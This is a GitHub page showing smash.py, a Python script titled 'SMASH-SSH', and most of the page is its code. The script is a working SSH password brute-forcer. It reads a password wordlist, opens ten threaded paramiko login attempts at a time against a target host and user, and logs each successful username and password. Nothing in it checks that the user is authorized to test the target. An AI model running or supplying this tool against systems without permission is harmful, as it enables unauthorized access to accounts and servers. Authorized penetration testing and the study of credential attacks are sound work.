-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsmash.py
96 lines (70 loc) · 3.73 KB
/
smash.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
'''
'''
import os
import threading
import logging
from paramiko import SSHClient, AutoAddPolicy, AuthenticationException, ssh_exception
import argparse
DEFAULT_PORT = 22
def send_payload(host, username, password, port):
client = SSHClient()
client.set_missing_host_key_policy(AutoAddPolicy())
try:
client.connect(host, port=port, username=username, password=password, banner_timeout=300)
logging.info(f"[+] SUCCESS: {username}:{password} on {host}")
client.close()
except AuthenticationException:
logging.warning(f"[-] Invalid Credentials: {username}:{password}")
except ssh_exception.SSHException:
logging.error("[!] SSHException: Possible rate-limiting on server")
except Exception as error:
logging.error(f"[!] Connection Error: {error}")
finally:
client.close()
def help_docs():
pass
def brute_force_ssh(host, username, wordlist, port):
if not os.path.exists(wordlist):
logging.error(f"[!] Wordlist file '{wordlist}' not found.")
return
with open(wordlist, "r", encoding="utf-8") as file:
passwords = [line.strip() for line in file if line.strip()]
threads = []
for password in passwords:
thread = threading.Thread(target=send_payload, args=(host, username, password, port))
threads.append(thread)
thread.start()
# Limit thread count to avoid overloading
if len(threads) >= 10:
for t in threads:
t.join()
threads.clear()
# Join any remaining threads
for t in threads:
t.join()
def print_banner():
ascii_art = """
███████╗███╗ ███╗ █████╗ ███████╗██╗ ██╗ ███████╗███████╗██╗ ██╗
██╔════╝████╗ ████║██╔══██╗██╔════╝██║ ██║ ██╔════╝██╔════╝██║ ██║
███████╗██╔████╔██║███████║███████╗███████║ ███████╗███████╗███████║
╚════██║██║╚██╔╝██║██╔══██║╚════██║██╔══██║ ╚════██║╚════██║██╔══██║
███████║██║ ╚═╝ ██║██║ ██║███████║██║ ██║ ███████║███████║██║ ██║
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚══════╝╚══════╝╚═╝ ╚═╝
"""
print(ascii_art)
def parse_args():
parser = argparse.ArgumentParser(description="SMASH-SSH: A fast SSH brute-forcer.")
parser.add_argument("-H", "--host", required=True, help="Target SSH server IP or hostname")
parser.add_argument("-u", "--username", required=True, help="Username to attempt login")
parser.add_argument("-w", "--wordlist", required=True, help="Path to password wordlist file")
parser.add_argument("-p", "--port", type=int, default=DEFAULT_PORT, help="SSH port (default: 22)")
return parser.parse_args()
def main():
#TODO confirm file can be reached and exists
#TODO validate if correct host is provided
print_banner()
args = parse_args()
logging.info(f"[*] Starting SSH brute-force on {args.host}:{args.port} with user '{args.username}'")
brute_force_ssh(args.host, args.username, args.wordlist, args.port)
if __name__=="__main__":
main()